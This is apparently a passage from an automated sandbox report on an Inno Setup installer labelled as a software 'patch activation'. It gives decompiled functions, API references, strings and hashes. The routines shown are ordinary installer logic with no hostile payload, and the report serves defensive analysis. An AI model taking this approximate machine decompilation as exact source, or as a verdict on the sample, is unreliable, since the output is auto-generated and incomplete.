			E00485E3C() {
				struct _SYSTEM_INFO _v44;
				_Unknown_base(*)()* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t11;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr* _t23;

				 *0x49f446 = 0;
				_t20 = GetModuleHandleA("kernel32.dll");
				_t5 = GetProcAddress(_t20, "GetNativeSystemInfo");
				if(_t5 == 0) {
					GetSystemInfo( &_v44);
				} else {
					 *_t5( &_v44); // executed
					_t22 = GetProcAddress(_t20, "IsWow64Process");
					if(_t22 != 0) {
						_push(_t23);
						_push(GetCurrentProcess());
						if( *_t22() != 0 &&  *_t23 != 0 && E00452EF4() != 0 && GetProcAddress(_t20, "GetSystemWow64DirectoryA") != 0 && GetProcAddress(GetModuleHandleA("advapi32.dll"), "RegDeleteKeyExA") != 0) {
							 *0x49f446 = 1;
						}
					}
				}
				_t8 = _v44.dwOemId - 1;
				if(_t8 < 0) {
					 *0x49cc98 = 1;
					return _t8;
				} else {
					_t9 = _t8 - 5;
					if(_t9 == 0) {
						 *0x49cc98 = 3;
						return _t9;
					}
					_t10 = _t9 - 3;
					if(_t10 == 0) {
						 *0x49cc98 = 2;
						return _t10;
					}
					_t11 = _t10 - 3;
					if(_t11 == 0) {
						 *0x49cc98 = 4;
						return _t11;
					}
					 *0x49cc98 = 0;
					return _t11;
				}
			}

0x00485e41
0x00485e52
0x00485e5a
0x00485e61
0x00485ecd
0x00485e63
0x00485e68
0x00485e75
0x00485e79
0x00485e7b
0x00485e81
0x00485e86
0x00485ebf
0x00485ebf
0x00485e86
0x00485e79
0x00485ed7
0x00485edb
0x00485ef1
0x00000000
0x00485edd
0x00485edd
0x00485ee1
0x00485efa
0x00000000
0x00485efa
0x00485ee3
0x00485ee7
0x00485f03
0x00000000
0x00485f03
0x00485ee9
0x00485eed
0x00485f0c
0x00000000
0x00485f0c
0x00485f15
0x00000000
0x00485f15

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00485E4D
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00485E5A
GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00485E68
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00485E70
GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00485E7C
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00485E9D
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00485EB0
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00485EB6
GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00485ECD

Strings

GetNativeSystemInfo, xrefs: 00485E54
IsWow64Process, xrefs: 00485E6A
RegDeleteKeyExA, xrefs: 00485EA6
advapi32.dll, xrefs: 00485EAB
GetSystemWow64DirectoryA, xrefs: 00485E97
kernel32.dll, xrefs: 00485E48

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
API String ID: 2230631259-2623177817
Opcode ID: 9d291c22a71a0cf1a9fee4c4184e10d43f1fae15fdb33576c9d22a7be2dcaa12
Instruction ID: 52726a1ce108b2e1205f78178c8bd3673f5dc6952592f7a0a7a67ab458256f91
Opcode Fuzzy Hash: 9d291c22a71a0cf1a9fee4c4184e10d43f1fae15fdb33576c9d22a7be2dcaa12
Instruction Fuzzy Hash: FD118465148F8195DE1273794C8A77F2A888B10718F2C0C3B7B847A6D2DBBC8D85972F

Uniqueness

Uniqueness Score: -1.00%

Function 0046A2F8 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0046A2F8(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char* _v40;
				intOrPtr _t62;
				void* _t76;
				intOrPtr _t77;
				void* _t78;
				void* _t90;
				void* _t92;
				void* _t100;
				void* _t102;
				intOrPtr* _t114;
				intOrPtr _t134;
				intOrPtr _t139;
				void* _t156;
				void* _t158;
				void* _t160;
				void* _t161;
				intOrPtr _t162;

				_t160 = _t161;
				_t162 = _t161 + 0xffffffdc;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_t158 = __eax;
				_push(_t160);
				_push(0x46a52d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t162;
				_t62 =  *0x49f1ec; // 0x2268b68
				E0047E4A8(_t62, __ecx,  &_v16);
				if(_v16 == 0) {
					L22:
					__eflags = 0;
					_pop(_t134);
					 *[fs:eax] = _t134;
					_push(E0046A534);
					return E00403420( &_v24, 4);
				} else {
					E0047AF98(_v16, __ecx,  &_v20);
					_t156 = 2;
					_t114 = 0x49cb7c;
					while(1) {
						_v40 = "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
						_v36 = 0xb;
						_v32 = _v20;
						_v28 = 0xb;
						E00407D84("%s\\%s_is1", 1,  &_v40,  &_v24);
						_t76 = E00403738(_v24);
						_t77 =  *0x49cc94; // 0x2, executed
						_t78 = E0042E2AC(_t77, _t76,  *_t114,  &_v8, 1, 0); // executed
						if(_t78 == 0) {
							_push(_t160);
							_push(0x46a501);
							_push( *[fs:eax]);
							 *[fs:eax] = _t162;
							if(( *0x49f31c & 0x00000040) != 0) {
								E0042E1DC();
							}
							break;
						}
						_t114 = _t114 + 4;
						_t156 = _t156 - 1;
						__eflags = _t156;
						if(_t156 != 0) {
							continue;
						} else {
							goto L22;
						}
						goto L23;
					}
					if(( *0x49f31d & 0x00000001) != 0) {
						E0042E1DC();
						if(E0042E1F4(_v8, "Inno Setup: No Icons") != 0) {
							 *((char*)(_t158 + 0x320)) = 1;
						}
					}
					if(( *0x49f31d & 0x00000004) != 0) {
						E0042E1DC();
						_t100 = E0042E1DC();
						_t169 = _t100;
						if(_t100 != 0) {
							E004319E8( *((intOrPtr*)(_t158 + 0x324)), _t114, _v12, _t156, _t158, _t169);
						}
						_t102 = E0042E1DC();
						_t170 = _t102;
						if(_t102 != 0) {
							E004319E8( *((intOrPtr*)(_t158 + 0x328)), _t114, _v12, _t156, _t158, _t170);
						}
					}
					if(( *0x49f31d & 0x00000080) != 0) {
						_t90 = E0042E1DC();
						_t172 = _t90;
						if(_t90 != 0) {
							E004319E8( *((intOrPtr*)(_t158 + 0x32c)), _t114, _v12, _t156, _t158, _t172);
						}
						_t92 = E0042E1DC();
						_t173 = _t92;
						if(_t92 != 0) {
							E004319E8( *((intOrPtr*)(_t158 + 0x330)), _t114, _v12, _t156, _t158, _t173);
						}
					}
					if(( *0x49f31e & 0x00000020) != 0) {
						E0042E1DC();
						E0042E1DC();
						E0042E1DC();
					}
					_pop(_t139);
					 *[fs:eax] = _t139;
					_push(E0046A512);
					return RegCloseKey(_v8);
				}
				L23:
			}

0x0046a2f9
0x0046a2fb
0x0046a303
0x0046a306
0x0046a309
0x0046a30c
0x0046a30f
0x0046a313
0x0046a314
0x0046a319
0x0046a31c
0x0046a322
0x0046a327
0x0046a330
0x0046a512
0x0046a512
0x0046a514
0x0046a517
0x0046a51a
0x0046a52c
0x0046a336
0x0046a33c
0x0046a341
0x0046a346
0x0046a34b
0x0046a35c
0x0046a35f
0x0046a366
0x0046a369
0x0046a37a
0x0046a382
0x0046a38b
0x0046a390
0x0046a397
0x0046a39f
0x0046a3a0
0x0046a3a5
0x0046a3a8
0x0046a3b2
0x0046a3c2
0x0046a3c2
0x00000000
0x0046a3b2
0x0046a508
0x0046a50b
0x0046a50b
0x0046a50c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0046a50c
0x0046a3ce
0x0046a3de
0x0046a3f2
0x0046a3f4
0x0046a3f4
0x0046a3f2
0x0046a402
0x0046a412
0x0046a422
0x0046a427
0x0046a429
0x0046a434
0x0046a434
0x0046a444
0x0046a449
0x0046a44b
0x0046a456
0x0046a456
0x0046a44b
0x0046a462
0x0046a46f
0x0046a474
0x0046a476
0x0046a481
0x0046a481
0x0046a491
0x0046a496
0x0046a498
0x0046a4a3
0x0046a4a3
0x0046a498
0x0046a4af
0x0046a4bf
0x0046a4d2
0x0046a4e5
0x0046a4e5
0x0046a4ec
0x0046a4ef
0x0046a4f2
0x0046a500
0x0046a500
0x00000000

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegCloseKey.ADVAPI32(?,0046A512,?,?,00000001,00000000,00000000,0046A52D,?,00000000,00000000,?), ref: 0046A4FB

Strings

Inno Setup: Deselected Components, xrefs: 0046A43C
Inno Setup: App Path, xrefs: 0046A3BA
Inno Setup: User Info: Name, xrefs: 0046A4B7
Inno Setup: Selected Components, xrefs: 0046A41A
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0046A357
Inno Setup: Icon Group, xrefs: 0046A3D6
Inno Setup: Deselected Tasks, xrefs: 0046A489
%s\%s_is1, xrefs: 0046A375
Inno Setup: Selected Tasks, xrefs: 0046A467
Inno Setup: User Info: Serial, xrefs: 0046A4DD
Inno Setup: No Icons, xrefs: 0046A3E3
Inno Setup: Setup Type, xrefs: 0046A40A
Inno Setup: User Info: Organization, xrefs: 0046A4CA

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1093091907
Opcode ID: 55465f8b1ecb84598e1fa3f417a1a599462ef7b6c0253ef331ed16acccad8cce
Instruction ID: bc3733d3a6311be72aa26145a3a6b26ae63bc40f30ab818c77ebdc0ae002d22e
Opcode Fuzzy Hash: 55465f8b1ecb84598e1fa3f417a1a599462ef7b6c0253ef331ed16acccad8cce
Instruction Fuzzy Hash: 2F518170600A049FCB11DB65D952BEEB7B4EF49304F5084BAE841B7391E738AE15CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0047E8A8 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E0047E8A8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _t57;
				intOrPtr _t65;
				unsigned int _t69;
				void* _t72;
				char _t74;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t97;
				intOrPtr _t103;
				void* _t114;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t152;
				void* _t161;
				void* _t162;
				intOrPtr _t163;

				_t159 = __esi;
				_t158 = __edi;
				_t114 = __ecx;
				_t113 = __ebx;
				_t161 = _t162;
				_t163 = _t162 + 0xfffffff8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = 0;
				_push(_t161);
				_push(0x47eb7c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t163;
				E0042DD28( &_v12);
				E00403450(0x49f194, __ebx, _v12, __edi, __esi);
				E0042DD54( &_v12);
				E00403450(0x49f198, _t113, _v12, _t158, _t159);
				E0042DD80( &_v12);
				E00403450(0x49f19c, _t113, _v12, _t158, _t159);
				if( *0x49c0dc != 2) {
					E00403400(0x49f1a0);
				} else {
					E0042D698("SystemDrive", _t114,  &_v12);
					E00403450(0x49f1a0, _t113, _v12, _t158, _t159);
				}
				if( *0x49f1a0 == 0) {
					_t103 =  *0x49f194; // 0x230ec2c
					E0042CD5C(_t103,  &_v12);
					E00403450(0x49f1a0, _t113, _v12, _t158, _t159);
					_t166 =  *0x49f1a0;
					if( *0x49f1a0 == 0) {
						E00403450(0x49f1a0, _t113, 0x47eba8, _t158, _t159);
					}
				}
				E0047E730(1, "ProgramFilesDir", _t166); // executed
				E00403450(0x49f1a4, _t113, _v12, _t158, _t159);
				_t167 =  *0x49f1a4;
				if( *0x49f1a4 == 0) {
					_t152 =  *0x49f1a0; // 0x23110d0
					E004035C0(0x49f1a4, "\\Program Files", _t152);
				}
				E0047E730(1, "CommonFilesDir", _t167); // executed
				E00403450(0x49f1a8, _t113, _v12, _t158, _t159);
				if( *0x49f1a8 == 0) {
					_t97 =  *0x49f1a4; // 0x23110e0
					E0042C88C(_t97,  &_v12);
					E004035C0(0x49f1a8, "Common Files", _v12);
				}
				_t169 =  *0x49f446;
				if( *0x49f446 != 0) {
					E0047E730(2, "ProgramFilesDir", _t169); // executed
					E00403450(0x49f1ac, _t113, _v12, _t158, _t159);
					_t170 =  *0x49f1ac;
					if( *0x49f1ac == 0) {
						E00453B40("Failed to get path of 64-bit Program Files directory", _t113, _t158, _t159, _t170);
					}
					E0047E730(2, "CommonFilesDir", _t170); // executed
					E00403450(0x49f1b0, _t113, _v12, _t158, _t159);
					_t171 =  *0x49f1b0;
					if( *0x49f1b0 == 0) {
						E00453B40("Failed to get path of 64-bit Common Files directory", _t113, _t158, _t159, _t171);
					}
				}
				if( *0x49f50c == 0) {
					L21:
					__eflags =  *0x49f445;
					if( *0x49f445 == 0) {
						_t57 =  *0x49f194; // 0x230ec2c
						E0042C88C(_t57,  &_v12);
						E004035C0(0x49f1bc, "COMMAND.COM", _v12); // executed
					} else {
						_t65 =  *0x49f198; // 0x2311090
						E0042C88C(_t65,  &_v12);
						E004035C0(0x49f1bc, "cmd.exe", _v12);
					}
					E0047E814(); // executed
					__eflags = 0;
					_pop(_t139);
					 *[fs:eax] = _t139;
					_push(E0047EB83);
					return E00403400( &_v12);
				} else {
					_t69 =  *0x49f458; // 0xa0042ee
					if(_t69 >> 0x10 < 0x600) {
						goto L21;
					} else {
						_t72 =  *0x49f50c(0x49cd48, 0x8000, 0,  &_v8); // executed
						if(_t72 != 0) {
							_t74 =  *0x49f50c( &E0049CD58, 0x8000, 0,  &_v8); // executed
							__eflags = _t74;
							if(_t74 != 0) {
								goto L21;
							} else {
								_push(_t161);
								_push(0x47eb11);
								_push( *[fs:eax]);
								 *[fs:eax] = _t163;
								E00403BA4();
								__eflags = 0;
								_pop(_t143);
								 *[fs:eax] = _t143;
								_push(E0047EB18);
								_t79 = _v8;
								_push(_t79);
								L0042D0E4();
								return _t79;
							}
						} else {
							_push(_t161);
							_push(0x47eabe);
							_push( *[fs:eax]);
							 *[fs:eax] = _t163;
							E00403BA4();
							_pop(_t145);
							 *[fs:eax] = _t145;
							_push(E0047EAC5);
							_t84 = _v8;
							_push(_t84);
							L0042D0E4();
							return _t84;
						}
					}
				}
			}

0x0047e8a8
0x0047e8a8
0x0047e8a8
0x0047e8a8
0x0047e8a9
0x0047e8ab
0x0047e8ae
0x0047e8af
0x0047e8b0
0x0047e8b3
0x0047e8b8
0x0047e8b9
0x0047e8be
0x0047e8c1
0x0047e8c7
0x0047e8d4
0x0047e8dc
0x0047e8e9
0x0047e8f1
0x0047e8fe
0x0047e90a
0x0047e92d
0x0047e90c
0x0047e914
0x0047e921
0x0047e921
0x0047e939
0x0047e93e
0x0047e943
0x0047e950
0x0047e955
0x0047e95c
0x0047e968
0x0047e968
0x0047e95c
0x0047e977
0x0047e984
0x0047e989
0x0047e990
0x0047e99c
0x0047e9a2
0x0047e9a2
0x0047e9b1
0x0047e9be
0x0047e9ca
0x0047e9cf
0x0047e9d4
0x0047e9e6
0x0047e9e6
0x0047e9eb
0x0047e9f2
0x0047e9fe
0x0047ea0b
0x0047ea10
0x0047ea17
0x0047ea1e
0x0047ea1e
0x0047ea2d
0x0047ea3a
0x0047ea3f
0x0047ea46
0x0047ea4d
0x0047ea4d
0x0047ea46
0x0047ea59
0x0047eb18
0x0047eb18
0x0047eb1f
0x0047eb45
0x0047eb4a
0x0047eb5c
0x0047eb21
0x0047eb24
0x0047eb29
0x0047eb3b
0x0047eb3b
0x0047eb61
0x0047eb66
0x0047eb68
0x0047eb6b
0x0047eb6e
0x0047eb7b
0x0047ea5f
0x0047ea5f
0x0047ea6c
0x00000000
0x0047ea72
0x0047ea82
0x0047ea8a
0x0047ead5
0x0047eadb
0x0047eadd
0x00000000
0x0047eadf
0x0047eae1
0x0047eae2
0x0047eae7
0x0047eaea
0x0047eaf5
0x0047eafa
0x0047eafc
0x0047eaff
0x0047eb02
0x0047eb07
0x0047eb0a
0x0047eb0b
0x0047eb10
0x0047eb10
0x0047ea8c
0x0047ea8e
0x0047ea8f
0x0047ea94
0x0047ea97
0x0047eaa2
0x0047eaa9
0x0047eaac
0x0047eaaf
0x0047eab4
0x0047eab7
0x0047eab8
0x0047eabd
0x0047eabd
0x0047ea8a
0x0047ea6c

APIs

Part of subcall function 0042DD28: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,004545B0,00000000,00454862,?,?,00000000,0049E62C,00000004,00000000,00000000,00000000,?,0049B229), ref: 0042DD3B

Part of subcall function 0042DD54: GetSystemDirectoryA.KERNEL32 ref: 0042DD67

Part of subcall function 0042DD80: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00454356,00000000,004543F9,?,?,00000000,00000000,00000000,00000000,00000000,?,004547E9,00000000), ref: 0042DD9A
Part of subcall function 0042DD80: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042DDA0

SHGetKnownFolderPath.SHELL32(0049CD48,00008000,00000000,?,00000000,0047EB7C), ref: 0047EA82
770FA680.OLE32(?,0047EAC5), ref: 0047EAB8

Part of subcall function 0042D698: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DECE,00000000,0042DF60,?,?,?,0049E62C,00000000,00000000), ref: 0042D6C3

Strings

\Program Files, xrefs: 0047E997
ProgramFilesDir, xrefs: 0047E970, 0047E9F7
Failed to get path of 64-bit Common Files directory, xrefs: 0047EA48
Common Files, xrefs: 0047E9E1
COMMAND.COM, xrefs: 0047EB57
cmd.exe, xrefs: 0047EB36
SystemDrive, xrefs: 0047E90F
Failed to get path of 64-bit Program Files directory, xrefs: 0047EA19
CommonFilesDir, xrefs: 0047E9AA, 0047EA26

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Directory$A680AddressEnvironmentFolderHandleKnownModulePathProcSystemVariableWindows
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 1289754905-544719455
Opcode ID: f8969b8c83ddcc016eba2be8046c2e4320b88b0f19ff27ae1324c962e61ddc41
Instruction ID: 78e7a351989074df20a48af568640fcf9ae091c764a67f88943fd453c39c20c9
Opcode Fuzzy Hash: f8969b8c83ddcc016eba2be8046c2e4320b88b0f19ff27ae1324c962e61ddc41
Instruction Fuzzy Hash: D4616034610104DFDB10EBA6D84269E7F69EB48319F60C6BBE404E7395C73CAE49CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0047F0B4 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 104
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0047F0B4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t44;
				struct HINSTANCE__* _t54;
				struct HINSTANCE__* _t55;
				intOrPtr _t70;
				_Unknown_base(*)()* _t77;
				intOrPtr _t91;
				void* _t101;

				_t98 = __esi;
				_t97 = __edi;
				_t76 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_push(_t101);
				_push(0x47f21f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t101 + 0xffffffe4;
				E0042DD54( &_v24);
				E0042C88C(_v24,  &_v20);
				E004035C0( &_v8, "shfolder.dll", _v20);
				if(E00452DB0( &_v16) == 0 || _v16 <= 0x50032 && (_v16 != 0x50032 || _v12 <= 0x12c708fc)) {
					if(_v16 != 0x50032 || _v12 != 0x12c708fc) {
						_t44 = 0;
					} else {
						goto L7;
					}
				} else {
					L7:
					_t44 = 1;
				}
				_t110 = _t44;
				if(_t44 == 0) {
					_t70 =  *0x49f190; // 0x23112b4
					E0042C88C(_t70,  &_v20);
					E004035C0( &_v8, "_isetup\\_shfoldr.dll", _v20);
					E0047ED78("SHFOLDERDLL", _t76, _v8, _t97, _t98, _t110);
				}
				E0042DD54( &_v24);
				E0042C88C(_v24,  &_v20);
				E0040357C( &_v20, "shell32.dll");
				E0042E824(_v20, _t76, 0x8000); // executed
				_t54 = E0042E824(_v8, _t76, 0x8000); // executed
				 *0x49f504 = _t54;
				if( *0x49f504 == 0) {
					_v32 = _v8;
					_v28 = 0xb;
					E00407D84("Failed to load DLL \"%s\"", 0,  &_v32,  &_v20);
					E00453B40(_v20, _t76, _t97, _t98, 0);
				}
				_t55 =  *0x49f504; // 0x73c00000
				_t77 = GetProcAddress(_t55, "SHGetFolderPathA");
				 *0x49f508 = _t77;
				_t113 = _t77;
				if(_t77 == 0) {
					E00453B40("Failed to get address of SHGetFolderPath function", _t77, _t97, _t98, _t113);
				}
				_pop(_t91);
				 *[fs:eax] = _t91;
				_push(E0047F226);
				E00403420( &_v24, 2);
				return E00403400( &_v8);
			}

0x0047f0b4
0x0047f0b4
0x0047f0b4
0x0047f0ba
0x0047f0bb
0x0047f0bc
0x0047f0bf
0x0047f0c2
0x0047f0c5
0x0047f0ca
0x0047f0cb
0x0047f0d0
0x0047f0d3
0x0047f0d9
0x0047f0e4
0x0047f0f4
0x0047f106
0x0047f12a
0x0047f135
0x00000000
0x00000000
0x00000000
0x0047f139
0x0047f139
0x0047f139
0x0047f139
0x0047f13b
0x0047f13d
0x0047f142
0x0047f147
0x0047f157
0x0047f164
0x0047f164
0x0047f16c
0x0047f177
0x0047f184
0x0047f191
0x0047f19e
0x0047f1a3
0x0047f1af
0x0047f1b8
0x0047f1bb
0x0047f1c9
0x0047f1d1
0x0047f1d1
0x0047f1db
0x0047f1e6
0x0047f1e8
0x0047f1ee
0x0047f1f0
0x0047f1f7
0x0047f1f7
0x0047f1fe
0x0047f201
0x0047f204
0x0047f211
0x0047f21e

APIs

Part of subcall function 0042DD54: GetSystemDirectoryA.KERNEL32 ref: 0042DD67

GetProcAddress.KERNEL32(73C00000,SHGetFolderPathA), ref: 0047F1E1

Strings

_isetup\_shfoldr.dll, xrefs: 0047F152
shell32.dll, xrefs: 0047F17F
Failed to load DLL "%s", xrefs: 0047F1C4
shfolder.dll, xrefs: 0047F0EF
SHFOLDERDLL, xrefs: 0047F15F
Failed to get address of SHGetFolderPath function, xrefs: 0047F1F2
2, xrefs: 0047F123
SHGetFolderPathA, xrefs: 0047F1D6

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressDirectoryProcSystem
String ID: 2$Failed to get address of SHGetFolderPath function$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
API String ID: 996212319-3422985891
Opcode ID: bc52ae8ca97decd057a22e62308b2ca98b91365db34e2635b6964e716f063628
Instruction ID: 162927b5a2cba69edd54960eab9b72e157ae6c4c2e5edd016ae03b58ced20ba2
Opcode Fuzzy Hash: bc52ae8ca97decd057a22e62308b2ca98b91365db34e2635b6964e716f063628
Instruction Fuzzy Hash: C1413034A0020ADFCB10EFA5D9819EEB7B5EF44309F90847BE518A7252D7389E09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00423D04 Relevance: 15.1, APIs: 10, Instructions: 98
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00423D04(int __eax, void* __edi, void* __esi) {
				void* __ebx;
				int _t12;
				long _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t15;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				struct HINSTANCE__* _t21;
				void* _t23;
				CHAR* _t24;
				struct HWND__* _t25;
				long _t38;
				struct HINSTANCE__* _t41;
				int _t45;
				struct HMENU__* _t46;
				struct _WNDCLASSA* _t54;
				short _t57;

				_t12 = __eax;
				_t45 = __eax;
				if( *((char*)(__eax + 0x7e)) != 0) {
					L12:
					return _t12;
				}
				_t13 = E0041F854(E0042409C, __eax); // executed
				 *(_t45 + 0x24) = _t13;
				_t14 =  *0x49c654; // 0x423b0c
				_t15 =  *0x49e014; // 0x400000
				if(GetClassInfoA(_t15, _t14, _t54) == 0) {
					_t41 =  *0x49e014; // 0x400000
					 *0x49c640 = _t41;
					_t57 = RegisterClassA(0x49c630);
					if(_t57 == 0) {
						E0040914C(_t45, 0xf02c, 1, __edi, __esi);
						E0040311C();
					}
				}
				_t17 = GetSystemMetrics(0); // executed
				_t18 = _t17 >> 1;
				if(_t57 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t18);
				_t20 = GetSystemMetrics(1) >> 1;
				if(_t57 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t21 =  *0x49e014; // 0x400000
				_push(_t21);
				_push(0);
				_t3 = _t45 + 0x6c; // 0x20040
				_t23 = E00403738( *_t3);
				_t24 =  *0x49c654; // 0x423b0c, executed
				_t25 = E00406300(_t24, 0x94ca0000, _t23); // executed
				 *(_t45 + 0x20) = _t25;
				_t5 = _t45 + 0x6c; // 0x41f2a0
				E00403400(_t5);
				 *((char*)(_t45 + 0x7e)) = 1;
				_t7 = _t45 + 0x20; // 0x4108f0
				E00423ADC( *_t7, 9, _t57);
				_t8 = _t45 + 0x24; // 0x423b1c
				_t9 = _t45 + 0x20; // 0x4108f0
				SetWindowLongA( *_t9, 0xfffffffc,  *_t8);
				if( *0x49e5c8 != 0) {
					_t38 = E00424608(_t45);
					_t10 = _t45 + 0x20; // 0x4108f0
					SendMessageA( *_t10, 0x80, 1, _t38); // executed
				}
				_t11 = _t45 + 0x20; // 0x4108f0
				_t46 = GetSystemMenu( *_t11, 0);
				DeleteMenu(_t46, 0xf030, 0);
				_t12 = DeleteMenu(_t46, 0xf000, 0);
				if( *0x49e5c8 == 0) {
